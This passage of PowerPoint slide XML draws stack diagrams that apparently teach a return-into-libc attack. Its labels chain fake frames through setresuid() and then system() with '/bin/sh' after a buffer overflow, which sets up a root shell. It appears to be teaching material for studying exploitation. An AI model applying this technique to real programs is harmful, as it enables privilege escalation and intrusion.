          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4343400" y="10287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411" name="Rectangle 67"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="41719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epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209413" name="Line 69"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6477000" y="4457700"/>
            <a:ext cx="0" cy="6858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414" name="Line 70"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4572000" y="4457700"/>
            <a:ext cx="0" cy="6858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415" name="Line 71"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6477000" y="51435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416" name="Line 72"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4572000" y="51435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417" name="Rectangle 73"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5480050" y="4366023"/>
            <a:ext cx="184666" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209418" name="Rectangle 74"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="38862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fake1 (ptr to fake2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209419" name="Rectangle 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="36004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err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>setresuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209420" name="Rectangle 76"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="33147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epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209421" name="Rectangle 77"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="30289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ruid (param 1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209422" name="Rectangle 78"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="27432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euid (param 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209423" name="Rectangle 79"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="24574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suid (param 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209424" name="Rectangle 80"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="21717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fake2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209425" name="Rectangle 81"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="18859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system()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209426" name="Rectangle 82"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="16002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epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209427" name="Rectangle 83"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="13144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“/bin/sh0”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209428" name="Line 84"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4572000" y="10287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429" name="Line 85"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6477000" y="10287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431" name="Line 87"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8610600" y="3886200"/>
            <a:ext cx="0" cy="12573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432" name="Line 88"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6705600" y="3886200"/>
            <a:ext cx="0" cy="12573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433" name="Line 89"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8610600" y="51435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434" name="Line 90"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6705600" y="51435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435" name="Rectangle 91"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7613650" y="4366023"/>
            <a:ext cx="184666" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209438" name="Rectangle 94"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="33147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epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209439" name="Rectangle 95"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="30289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ruid (param 1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209440" name="Rectangle 96"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="27432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euid (param 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209441" name="Rectangle 97"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="24574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suid (param 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209442" name="Rectangle 98"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="21717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fake2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209443" name="Rectangle 99"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="18859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system()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209444" name="Rectangle 100"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="16002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epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209445" name="Rectangle 101"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="13144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“/bin/sh0”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209446" name="Line 102"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6705600" y="10287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447" name="Line 103"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8610600" y="102870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09448" name="Rectangle 104"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="36004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err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>setresuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1209449" name="Text Box 105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4057652"/>
            <a:ext cx="1401346" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>This is the situation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>when entering into</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>setresuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>() from the</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ret in the epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Text Box 105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2498726" y="5200651"/>
            <a:ext cx="1398140" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>This is the situation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>after the overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Text Box 105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4675194" y="4470798"/>
            <a:ext cx="1513556" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>This is the situation </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>after the original </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>function returned and</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>before the execution </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>of the epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-36503" y="5145934"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="468110" y="990600"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="Right Arrow 1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="533400" y="990600"/>
              <a:ext cx="457200" cy="3810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72" name="Text Box 105"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="468110" y="1024133"/>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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-40190" y="4464768"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="571297" y="1719067"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="Right Arrow 72"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="636587" y="1719067"/>
              <a:ext cx="457200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="right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74" name="Text Box 105"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="571297" y="1752600"/>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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="77" name="Group 76"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2108210" y="5147270"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="468110" y="990600"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="Right Arrow 77"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="533400" y="990600"/>
              <a:ext cx="457200" cy="3810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79" name="Text Box 105"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="468110" y="1024133"/>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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="80" name="Group 79"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2104523" y="4472057"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="571297" y="1719067"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="Right Arrow 80"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="636587" y="1719067"/>
              <a:ext cx="457200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="right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82" name="Text Box 105"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="571297" y="1752600"/>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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="83" name="Group 82"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4241034" y="4464768"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="468110" y="990600"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="84" name="Right Arrow 83"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="533400" y="990600"/>
              <a:ext cx="457200" cy="3810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85" name="Text Box 105"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="468110" y="1024133"/>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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="86" name="Group 85"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4236484" y="3886200"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="571297" y="1719067"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="87" name="Right Arrow 86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="636587" y="1719067"/>
              <a:ext cx="457200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="right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88" name="Text Box 105"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="571297" y="1752600"/>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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="89" name="Group 88"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6363163" y="2171700"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="571297" y="1719067"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="90" name="Right Arrow 89"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="636587" y="1719067"/>
              <a:ext cx="457200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="right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91" name="Text Box 105"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="571297" y="1752600"/>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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="97" name="Group 96"/>
          <p:cNvGrpSpPr/>
